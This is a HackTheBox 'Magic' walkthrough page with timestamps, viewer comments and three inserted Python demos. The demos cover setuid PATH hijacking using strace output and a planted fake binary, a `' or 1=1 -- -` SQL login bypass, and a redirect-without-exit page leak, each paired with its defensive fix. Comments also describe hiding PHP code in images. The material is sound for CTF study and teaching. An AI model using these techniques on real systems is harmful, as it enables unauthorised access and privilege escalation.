HackTheBox - Magic

00:00 - Intro
00:50 - Nmap
02:40 - Starting GoBuster on the root and images
05:00 - Finding Auth Bypass via SQL Injection on login then throwing it to SQLMap
09:00 - Creating a basic PHP Shell, then attempting to upload it
12:30 - Grabbing the magic bytes off a JPG, then prepending it to our shell
16:00 - File uploaded, hunting for an LFI and doing more SQLMap
18:20 - Turns out we don't need the PHP Extension (.htaccess allows anything)
26:20 - Reverse Shell returned
27:50 - Grabbing the username and password out of Website Configuration
36:10 - Using VirusTotal to identify when a file was created
37:20 - Examining the .htaccess to see why we could execute code (should have a $ at the end)
39:30 - Using mysqldump to dump the database and get a password out of it, su to the theseus user
46:00 - Found a SetUID Binary (sysinfo) then using strace to see what it does
48:00 - Using the -f argument with strace to follow forks and see the exec() calls
51:00 - Using Path Injection since absolute paths were not used in exec() and getting a root shell
55:00 - Showing SQLMap did complete with the increased level/risk

Comments: 59

  • @InfiniteLogins
    3 years ago

    "that's there because of... reasons" - Ippsec I love this dude.

  • @somethingamongthebytes9228
    3 years ago

    Great as always! 🔥

  • @alexandrataita8331
    3 years ago

    @IppSec great job. I have been on your channel since I discovered it. I am really learning a lot, from Kenya. Kudos!!!👍👌

  • @il2626
    3 years ago

    It's the first machine I did on release day. Was really proud of being in the top 100 xD. I liked the root of this machine very much, but your video also explained to me many concepts that are behind the machine (why stuff works). Thank you for these videos, always.

  • @archangelos7426
    3 years ago

    My favorite and most enjoyable box so far !!!!!

  • @AbdennacerAyeb
    3 years ago

    Thank you for your efforts open-sourcing knowledge... great job

  • @virtulosity
    3 years ago

    Thanks for the vids :) - Awesome content

  • @loremipsum685
    3 years ago

    setuid + path injection was nice

  • @mi2has
    3 years ago

    i saw quite a few writeup, this one is cool

  • @dinbabush6472
    3 years ago

    Love it!

  • @clarb027
    3 years ago

    Always interesting to see a different (far more technical) way of working. I just used exiftool to embed the PHP into a JPG and uploaded it to give me command exec.

  • @disconnect3763
    3 years ago

    cool. I like the theme of your terminal.

  • @picious
    3 years ago

    !!!! Magician !!

  • @Ms.Robot.
    3 years ago

    Thank You sweetheart 💗🥳

  • @trashandchaos
    3 years ago

    You can use the -b flag on strace to specify syscalls, i.e. strace -b execve.

  • @brettnieman3453
    3 years ago

    Curious, if you had code exec through PHP, why do you go for a web shell first? Why not go directly to php rev shell?

  • @huhwhatwho7895
    3 years ago

    It's best to step slowly through until a rev TCP shell; sometimes firewalls or routing tables are in place. Thus with a webshell you can step your way up. In practice it's best to leak phpinfo() first and then enumerate which PHP functions are enabled/disabled. But then again this is a CTF machine so it won't be difficult :D

  • @alvinsmith8420
    1 year ago

    I think the last PE would only work for something like `popen` or `execv` that open other processes. The bash script can work under popen('div-script ...snip...'). In other more common scenarios, bash scripts don't honour SUID for security reasons. Please correct me if I'm wrong. Thank you.
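
An added example (not IppSec's code and not the box's binary) for the strace and PATH-injection steps at 46:00 to 51:00, and for the SUID point raised in the comment above: the privilege comes from the setuid bit on the compiled sysinfo binary, and a planted script only matters because that binary spawns helper commands by bare name, so the shell it starts resolves them through PATH while already running with an elevated euid. The script below parses `strace -f -e trace=execve` style output to find such bare-name commands, then performs the hijack against an ordinary user shell. The SAMPLE_TRACE, the command names diskreport and uptime, the pids and the pointers are constructed for illustration; the setuid caveat is in the comments.

```python
import ast
import os
import re
import subprocess
import tempfile

# Constructed sample of `strace -f -e trace=execve ./sysinfo` output, written in
# strace's execve line format. The command names, pids and pointers are made up
# for illustration; this is not the real trace from the box.
SAMPLE_TRACE = """\
execve("./sysinfo", ["./sysinfo"], 0x7ffd9c1e2a10 /* 21 vars */) = 0
[pid 12345] execve("/bin/sh", ["sh", "-c", "diskreport -l"], 0x55a1c0d5d2a0 /* 21 vars */) = 0
[pid 12345] execve("/usr/local/sbin/diskreport", ["diskreport", "-l"], 0x55e0a8c0 /* 21 vars */) = -1 ENOENT (No such file or directory)
[pid 12345] execve("/usr/local/bin/diskreport", ["diskreport", "-l"], 0x55e0a8c0 /* 21 vars */) = -1 ENOENT (No such file or directory)
[pid 12345] execve("/usr/sbin/diskreport", ["diskreport", "-l"], 0x55e0a8c0 /* 21 vars */) = 0
[pid 12346] execve("/bin/sh", ["sh", "-c", "/usr/bin/uptime"], 0x55a1c0d5d2a0 /* 21 vars */) = 0
"""

EXECVE_RE = re.compile(
    r'^(?:\[pid\s+(?P<pid>\d+)\]\s+)?'
    r'execve\("(?P<path>[^"]*)",\s*(?P<argv>\[[^\]]*\]),[^)]*\)'
    r'\s*=\s*(?P<ret>-?\d+)(?:\s+(?P<err>E[A-Z]+))?'
)


def parse_execve(trace):
    """Turn strace -f output into records: pid, path, argv, success flag, errno name."""
    records = []
    for line in trace.splitlines():
        m = EXECVE_RE.match(line)
        if not m:
            continue
        records.append({
            "pid": int(m.group("pid")) if m.group("pid") else None,
            "path": m.group("path"),
            "argv": ast.literal_eval(m.group("argv")),  # strace prints argv as a literal list
            "ok": m.group("ret") == "0",
            "err": m.group("err"),
        })
    return records


def hijack_candidates(records):
    """Map each command resolved through PATH to the directories probed before it
    was found. Two tell-tale shapes in the trace:
      * `sh -c "<cmd> ..."` where <cmd> is not an absolute path (system()/popen());
      * failed execve() probes ending in ENOENT: the PATH entries the shell tried
        first. A writable one is where the fake goes."""
    found = {}
    for r in records:
        argv = r["argv"]
        if (len(argv) >= 3 and os.path.basename(argv[0]) in ("sh", "bash", "dash")
                and argv[1] == "-c"):
            words = argv[2].split()
            if words and not words[0].startswith("/"):
                found.setdefault(words[0], [])
        elif r["err"] == "ENOENT":
            found.setdefault(os.path.basename(r["path"]), []).append(os.path.dirname(r["path"]))
    return found


def plant_fake(dirpath, name, body="#!/bin/sh\necho hijacked\n"):
    """Drop an executable carrying the victim's bare command name into a directory."""
    target = os.path.join(dirpath, name)
    with open(target, "w") as fh:
        fh.write(body)
    os.chmod(target, 0o755)
    return target


def run_with_hijacked_path(dirpath, command):
    """Run `command` the way the binary does (via sh -c) with our directory first
    in PATH. When the caller is setuid root the planted file runs with euid 0,
    provided the interpreter keeps it: bash resets euid to ruid unless started
    with -p, which is why a plain #!/bin/sh script or a compiled payload is the
    usual choice."""
    env = dict(os.environ)
    env["PATH"] = dirpath + os.pathsep + env.get("PATH", "/usr/bin:/bin")
    proc = subprocess.run(["sh", "-c", command], env=env,
                          capture_output=True, text=True)
    return proc.stdout


def demo(name="diskreport"):
    """End-to-end: plant the fake in a scratch dir and trigger the bare-name call."""
    with tempfile.TemporaryDirectory() as scratch:
        plant_fake(scratch, name)
        return run_with_hijacked_path(scratch, name + " -l").strip()


if __name__ == "__main__":
    for cmd, dirs in hijack_candidates(parse_execve(SAMPLE_TRACE)).items():
        print(f"{cmd}: resolved via PATH; probed first in {dirs or ['(unknown)']}")
    print("fake diskreport output:", demo())
```

The defensive reading of the same output: a setuid program should either call helpers by absolute path or set PATH itself before spawning anything, and `strace -f -e trace=execve` is the quickest way to check which of those a given binary actually does.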

  • @mikemutter4521
    2 years ago

    In the SQL " 'or 1=1 -- - ", what does the last slash mean? I know double slashes are for comments, and when I try it myself it only works if there is a space and another slash, and I don't understand why.

  • @ippsec
    2 years ago

    A comment is two dashes and a space. Sometimes the webapp will append a and not , so if you don't do it will be inconsistent. In no situation will adding the hurt, it can only help. Just like when I do "bash -c' bash -i ..." it's just a stability thing... The which I use for is just there so you can visually see the space.
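
To make the bypass concrete, here is an added example (not from the video; the table, column names and credentials are constructed) that builds the kind of concatenated query behind the login at 05:00, runs it against an in-memory SQLite database with the exact `' or 1=1 -- -` payload discussed in this thread, and contrasts it with the parameterised query that closes the hole.

```python
import sqlite3


# Constructed sample table and credentials; nothing here comes from the box.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO login (username, password) VALUES ('admin', 'correct-horse-battery')")
    conn.commit()
    return conn


def build_vulnerable_query(username, password):
    """The bug: user input is pasted into the SQL text, so a quote in the input
    ends the string literal and whatever follows is parsed as SQL."""
    return f"SELECT username FROM login WHERE username='{username}' AND password='{password}'"


def vulnerable_login(conn, username, password):
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def safe_login(conn, username, password):
    """The fix: bound parameters. The input stays data whatever it contains."""
    row = conn.execute(
        "SELECT username FROM login WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# ' or 1=1 -- -  : the quote closes username='', OR 1=1 makes the WHERE true
#                  for every row, and "-- " comments out AND password='...'.
# MySQL only treats "--" as a comment when whitespace follows it; the trailing
# "-" keeps that space from being trimmed away, which is why the payload is
# written "-- -". SQLite (used here) accepts the same payload.
PAYLOAD_BYPASS = "' or 1=1 -- -"
# admin' -- -    : same trick, but pins the result to a known user.
PAYLOAD_ADMIN = "admin' -- -"


if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_query(PAYLOAD_BYPASS, "whatever"))
    print("vulnerable login returns:", vulnerable_login(db, PAYLOAD_BYPASS, "whatever"))
    print("parameterised login returns:", safe_login(db, PAYLOAD_BYPASS, "whatever"))
```

Printing the built query is the habit worth keeping: seeing `username='' or 1=1 -- -' AND password='whatever'` spelled out makes it obvious which part the comment marker swallowed.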

  • @laurenzkaml3864
    3 years ago

    👍👌

  • @damnmayneunfiltered
    3 years ago

    Hope you or some die-hard fan reads this: can we get a playlist where you go into a box blind? I would do it, but I'm not as familiar with your entire collection. When you go into a box blind, we hear the depth and breadth of your methodologies.

  • @ippsec
    3 years ago

    A lot of the easy boxes I go at blind

  • @damnmayneunfiltered
    3 years ago

    @@ippsec Thanks. Should be no problem putting together a good playlist.

  • @darshanakhare6676
    3 years ago

    Kali 2020.4 is getting zsh as the default shell, what's your opinion? Caught you at 11:22 99s 😜🤭

  • @DHIRAL2908
    3 years ago

    Haha lol was gonna comment it!

  • @amoghnath3330
    3 years ago

    lol, would you mind explaining?

  • @terror403
    3 years ago

    i did it, i love it :)

  • @user-vq7my5te3b
    3 years ago

    The content type was screwed up because of that uglyish Burp, which tends to pop up and become the main window even when you fcn don't ask it to, and all typing goes there, spoiling everything. I've seen this so many times.

  • @aharonmo4188
    3 years ago

    Why don't you use Kali?

  • @johnnywilson3071
    3 years ago

    Personal preference probably.

  • @nicoswd
    3 years ago

    There's actually a second way to get to upload.php. While it's password protected, they're just doing a "Location:" redirect without exiting the script afterwards. So I just removed the redirect header from the response in Burp.

  • @jannmoon
    3 years ago

    Smart man. I went the unnecessary extra step by changing it to "200 OK" and really thought I was foolin' my browser 🤷‍♂️

  • @nicoswd
    3 years ago

    @@jannmoon While I fooled mine, I guess yours was a lot less confused about that response 🙃. But nice to see someone else caught this bug too!

  • @NytNaatitaan
    3 years ago

    Did the same :)
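
The redirect-without-exit bug described in this thread, as an added example that is not part of the video or the box's source: a small Python HTTP server stands in for upload.php (the paths /vuln, /fixed and /login.php and the "session=valid" cookie check are assumptions made for the demo), and a client that does not follow redirects reads the protected page straight out of the 302 body, which is what dropping the Location header in Burp achieves. The /fixed path shows the one-line cure: stop the script after sending the header.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Stand-in for the protected upload form; constructed for the demo.
PROTECTED_PAGE = (b"<html><body><form method='post' enctype='multipart/form-data'>"
                  b"upload form</form></body></html>")


class UploadHandler(BaseHTTPRequestHandler):
    """Two versions of a 'login-protected' page (paths are assumptions):

    /vuln  : sends 'Location: /login.php' and then keeps rendering the page,
             which is what PHP does when header() is not followed by exit;
    /fixed : sends the redirect and stops, so the 302 carries no body.
    """

    def do_GET(self):
        if "session=valid" in self.headers.get("Cookie", ""):
            self._send(200, PROTECTED_PAGE)
            return
        self.send_response(302)
        self.send_header("Location", "/login.php")
        if self.path == "/fixed":
            self.send_header("Content-Length", "0")
            self.end_headers()  # the equivalent of `exit;` right after header()
            return
        # Vulnerable path: the "redirect" is only a header; the script falls
        # through and the protected markup is written into the 302 response.
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(PROTECTED_PAGE)))
        self.end_headers()
        self.wfile.write(PROTECTED_PAGE)

    def _send(self, code, body):
        self.send_response(code)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def fetch_without_following(host, port, path):
    """What Burp showed: read the 302 itself instead of following it.
    http.client never follows redirects, so nothing has to be stripped."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request("GET", path)
        resp = conn.getresponse()
        return resp.status, resp.getheader("Location"), resp.read()
    finally:
        conn.close()


def run_demo():
    """Start the server on a random loopback port, hit both paths, return results."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), UploadHandler)
    thread = threading.Thread(target=server.serve_forever, daemon=True)
    thread.start()
    try:
        port = server.server_address[1]
        return {"vuln": fetch_without_following("127.0.0.1", port, "/vuln"),
                "fixed": fetch_without_following("127.0.0.1", port, "/fixed")}
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    for name, (status, location, body) in run_demo().items():
        print(f"{name}: {status} Location={location} body={body[:40]!r}")
```

A browser hides this bug because it follows the Location header before rendering anything; any client that can be told not to follow redirects (Burp, curl without -L, http.client here) sees the leak immediately, so checking 302 responses for a non-empty body is a cheap test to run against every "protected" page.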

  • @laurenzkaml3864
    3 years ago

    Could you just enter the username “admin-”? That should in theory do the job 🧐

  • @aneeshnadh5377
    3 years ago

    How do you set up the OS you are using?

  • @MohmdSy5
    3 years ago

    github.com/theGuildHall/pwnbox I guess this is what you're looking for

  • @MohmdSy5
    3 years ago

    It's a collaboration between HackTheBox and ParrotOS

  • @aneeshnadh5377
    3 years ago

    @@MohmdSy5 Thank you

  • @panosklainos3031
    3 years ago

    There is actually an easier way of uploading a shell by using exiftool to write the code in a real image.

  • @markgentry8675
    3 years ago

    That sounds interesting. Can you give me a simple example of how to do that?

  • @panosklainos3031
    3 years ago

    @@markgentry8675 I just used 'exiftool -Comment {php code} image.png'. Notice that this only works with the png extension and not jpg or jpeg. I think it's a way easier method and I never would have thought about adding the magic bytes.

  • @ayushprajapati2630
    1 year ago

    I thought it was gonna be a magic video after he said "I am doing magic"

  • @h8handles
    3 years ago

    It is funny seeing this after the 9-year sudo vuln was released. He said @ 37:00 you can't exploit it because we don't have access to sudo... yes you do, as we now know.

  • @leon1985ist
    3 years ago

    Hi IppSec, a few questions and some advice you could give here, hope not to bother. I'm a big fan here, am starting to support, and trying to get my PC build on; I just want to have the same environment. So first, I have 16 GB RAM; should I put in more RAM? Other question: you say the cracking box is a different machine; do you run a Linux-based system on it, or is it another virtual machine? And is it a good idea to run Linux as a base system on a PC or not? Hope you can understand my silly questions, hope to have advice about them, thanks.

  • @jannmoon
    3 years ago

    I know you didn't ask my opinion but here ya go anyway. I have 32 GB and haven't really seen it all burn up yet (besides hashcat getting my CPU to 90 C); last year with 16 it did slow down some. 16 is near perfect but 32 is flawless for me. Got into VPS and I love it, especially with all the credits for free from AWS and Google Cloud etc. I use it for any web-heavy directory fuzzing for bug bounties, and the speed and lack of IP bans is great. Finally, I use Kali as my main OS and it died a lot at first; then as soon as I finally started making 2-3 backups, no issues. It can be done but be prepared and back up stuff regularly; Windows workarounds are kinda necessary sometimes, so I kinda wish I had kept it as a dual boot instead of full Linux. Oh well!

  • @leon1985ist
    3 years ago

    @@jannmoon How do I get a VPS? What does it stand for?

  • @jack_brannan
    3 years ago

    Thanks. To semicolon be very nice

  • @IvanRandomDude
    3 years ago

    Site vulnerable to the most basic SQL injection in 2020, omegalul.

  • @Xbotto
    3 years ago

    Found the same broken login IRL in 2018, kekw

  • @user-fp6dt1os1l
    3 years ago

    I swear I've seen this one before... am I going mad?

  • @imperium305
    3 years ago

    Don't think so, but he has done a bunch of magic-byte trickery boxes in the past.

  • @xyhard8603
    3 years ago

    First?

  • @somasaha7934
    3 years ago

    Can you tell me please, how to make the parrot window screen!

  • @deepb5204
    3 years ago

    curl parrot.live 😛